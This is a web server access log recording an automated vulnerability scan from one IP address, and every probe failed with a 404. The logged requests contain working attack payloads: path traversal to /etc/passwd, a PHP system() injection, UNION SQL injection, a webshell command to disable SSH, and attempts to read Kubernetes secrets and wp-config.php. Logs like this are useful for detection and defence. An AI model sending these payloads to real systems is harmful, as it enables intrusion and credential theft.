137.220.197.141 - - [21/Jan/2024:07:08:43 +0100] "GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:08:51 +0100] "GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:09:47 +0100] "GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:10:13 +0100] "GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:10:25 +0100] "GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:10:36 +0100] "GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:10:49 +0100] "GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:12:44 +0100] "GET /nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:14:19 +0100] "GET /nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:14:21 +0100] "GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:14:29 +0100] "GET /nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:14:32 +0100] "GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:14:40 +0100] "GET /nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:14:49 +0100] "GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:15:12 +0100] "GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:15:35 +0100] "GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:16:26 +0100] "GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:16:37 +0100] "GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:16:44 +0100] "GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:16:51 +0100] "GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:16:58 +0100] "GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:18:09 +0100] "GET /nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:18:46 +0100] "GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:19:03 +0100] "GET /nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:19:28 +0100] "GET /nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:19:59 +0100] "GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:20:25 +0100] "GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:20:25 +0100] "GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:20:37 +0100] "GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:20:51 +0100] "GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:21:05 +0100] "POST /web/google_analytics.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:21:20 +0100] "GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:21:46 +0100] "GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:22:15 +0100] "GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:22:28 +0100] "POST /web/google_analytics.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:22:30 +0100] "GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:22:38 +0100] "POST /web/google_analytics.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:22:50 +0100] "POST /web/google_analytics.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:23:47 +0100] "GET /nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:24:21 +0100] "GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:24:46 +0100] "GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:25:15 +0100] "GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:25:39 +0100] "POST /web/google_analytics.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:25:39 +0100] "GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:26:00 +0100] "GET /nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:26:06 +0100] "GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:26:14 +0100] "GET /nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:26:24 +0100] "POST /web/google_analytics.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:26:24 +0100] "GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:26:27 +0100] "GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:26:35 +0100] "GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:26:45 +0100] "POST /web/google_analytics.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:26:48 +0100] "GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:28:07 +0100] "GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:28:18 +0100] "GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:28:30 +0100] "GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:28:32 +0100] "GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:28:46 +0100] "GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:29:59 +0100] "GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:30:24 +0100] "GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:30:28 +0100] "POST /web/google_analytics.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:30:39 +0100] "GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:30:41 +0100] "GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:31:19 +0100] "GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:31:45 +0100] "GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:32:06 +0100] "GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:32:12 +0100] "GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:32:22 +0100] "POST /web/google_analytics.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:32:26 +0100] "GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:32:34 +0100] "POST /web/google_analytics.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:32:56 +0100] "GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:32:56 +0100] "GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:32:58 +0100] "GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:33:07 +0100] "GET /admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:33:19 +0100] "GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:33:20 +0100] "GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:33:20 +0100] "GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:33:38 +0100] "GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:33:40 +0100] "GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:33:59 +0100] "GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:34:01 +0100] "GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:34:43 +0100] "GET /admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:34:56 +0100] "GET /admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:35:08 +0100] "GET /admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:36:02 +0100] "GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:36:04 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:36:06 +0100] "GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:36:06 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:36:08 +0100] "GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:36:29 +0100] "GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:36:31 +0100] "GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:36:55 +0100] "GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:36:57 +0100] "GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:37:42 +0100] "GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:38:17 +0100] "GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:38:25 +0100] "GET /enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:38:32 +0100] "GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:38:45 +0100] "GET /admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:38:51 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:38:53 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:39:12 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:39:14 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:39:37 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:39:39 +0100] "GET /admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:39:39 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:39:45 +0100] "GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:39:47 +0100] "GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:40:03 +0100] "GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:40:03 +0100] "GET /admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:40:05 +0100] "GET /enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:40:17 +0100] "GET /enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:40:17 +0100] "GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:40:30 +0100] "GET /enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:41:15 +0100] "GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:41:17 +0100] "GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:41:59 +0100] "GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:42:01 +0100] "GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:43:56 +0100] "GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:43:58 +0100] "GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:44:05 +0100] "GET /enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:44:26 +0100] "GET /admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:45:00 +0100] "GET /enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:45:26 +0100] "GET /enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:45:26 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:45:29 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:45:44 +0100] "GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:45:46 +0100] "GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:46:33 +0100] "GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:46:35 +0100] "GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:46:42 +0100] "GET /admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:46:57 +0100] "GET /admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:47:03 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:47:05 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:47:48 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:47:50 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:49:17 +0100] "GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:49:19 +0100] "GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:49:45 +0100] "GET /index.php?q=file:///etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:49:48 +0100] "GET /enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:49:52 +0100] "GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:51:25 +0100] "GET /index.php?q=file:///etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:51:32 +0100] "GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:51:36 +0100] "GET /index.php?q=file:///etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:51:44 +0100] "GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:51:49 +0100] "GET /index.php?q=file:///etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:51:57 +0100] "GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:52:04 +0100] "GET /enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:52:18 +0100] "GET /enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:53:11 +0100] "GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:53:13 +0100] "GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:53:36 +0100] "GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:53:38 +0100] "GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1" 404 952
205.210.31.105 - - [21/Jan/2024:07:54:04 +0100] "GET / HTTP/1.0" 404 952
137.220.197.141 - - [21/Jan/2024:07:54:57 +0100] "GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:54:59 +0100] "GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:55:11 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:55:13 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:55:17 +0100] "GET /index.php?q=file:///etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:55:29 +0100] "GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:56:09 +0100] "GET /index.php?q=file:///etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:56:23 +0100] "GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:56:34 +0100] "GET /index.php?q=file:///etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:56:49 +0100] "GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:57:22 +0100] "GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:59:01 +0100] "GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:59:07 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:59:09 +0100] "GET / HTTP/1.1" 404 952
